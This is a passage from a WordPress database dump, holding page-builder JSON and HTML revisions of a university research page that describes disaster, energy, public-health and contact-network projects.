need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"30\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 4\",\"attrs\":{\"id\":\"about-4\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c22\",\"parentId\":\"126-c21\",\"partialId\":126,\"styleRef\":362,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c23\",\"parentId\":\"126-c21\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c23\",\"index\":0,\"id\":\"126-c24\",\"partialId\":126,\"styleRef\":364,\"type\":\"content\",\"props\":{\"content\":\"The DICE Data Repository <br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c23\",\"index\":2,\"id\":\"126-c25\",\"partialId\":126,\"styleRef\":366,\"type\":\"content\",\"props\":{\"content\":\"<p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events & corresponding response and recovery efforts. <br><\\/p>\"}}],\"styleRef\":363,\"type\":\"content\"}],\"id\":\"126-c21\",\"parentId\":\"126-c20\",\"partialId\":126,\"styleRef\":361,\"type\":\"content\"}],\"id\":\"126-c20\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":360,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"Orpheus\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, which reflects our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2023-09-29 10:35:40','2023-09-29 14:35:40','',438,'https://gsudice.dataconn.net/?p=1454',0,'revision','',0),(1455,1,'2023-09-29 10:35:40','2023-09-29 14:35:40','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\n <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\n <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-392 style-local-126-c36\">\n <!---->\n <!---->\n <h5 class=\"\">Urban Scale Energy Assessments</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\n in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\n of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\n patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\n propose a plan for grid distribution optimized for human-centric usage and need.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\n <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-356 style-local-126-c17\">\n <!---->\n <!---->\n <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\n documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\n of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\n two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-359-outer style-local-126-c19-outer\">\n <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c20\" id=\"about-4\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-360 style-local-126-c20 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c21\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-361 style-local-126-c21 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-362-outer style-local-126-c22-outer\">\n <div data-colibri-id=\"126-c22\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-362 style-local-126-c22 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-363-outer style-local-126-c23-outer\">\n <div data-colibri-id=\"126-c23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-363 style-local-126-c23 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c24\" class=\"h-global-transition-all h-heading style-364 style-local-126-c24 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-364 style-local-126-c24\">\n <!---->\n <!---->\n <h5 class=\"\">The DICE Data Repository </h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c25\" class=\"h-text h-text-component style-366 style-local-126-c25 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment\n of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed\n ontology will define semantics associated with adverse events & corresponding response and recovery efforts. \n <br>\n </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\n <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-384 style-local-126-c29\">\n <!---->\n <!---->\n <h5 class=\"\">Orpheus</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\n the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\n can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\n <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\n <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\n <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-350 style-local-126-c12\">\n <!---->\n <!---->\n <h5 class=\"\">GSU Contact Network Prediction</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, which reflects our approach to this\n research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\n to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\n account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\n to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Research','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 10:35:40','2023-09-29 14:35:40','',126,'https://gsudice.dataconn.net/?p=1455',0,'revision','',0),(1461,1,'2023-09-29 10:36:20','2023-09-29 14:36:20','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"30\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 4\",\"attrs\":{\"id\":\"about-4\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c22\",\"parentId\":\"126-c21\",\"partialId\":126,\"styleRef\":362,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c23\",\"parentId\":\"126-c21\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c23\",\"index\":0,\"id\":\"126-c24\",\"partialId\":126,\"styleRef\":364,\"type\":\"content\",\"props\":{\"content\":\"The DICE Data Repository <br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c23\",\"index\":2,\"id\":\"126-c25\",\"partialId\":126,\"styleRef\":366,\"type\":\"content\",\"props\":{\"content\":\"<p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events & corresponding response and recovery efforts. <br><\\/p>\"}}],\"styleRef\":363,\"type\":\"content\"}],\"id\":\"126-c21\",\"parentId\":\"126-c20\",\"partialId\":126,\"styleRef\":361,\"type\":\"content\"}],\"id\":\"126-c20\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":360,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 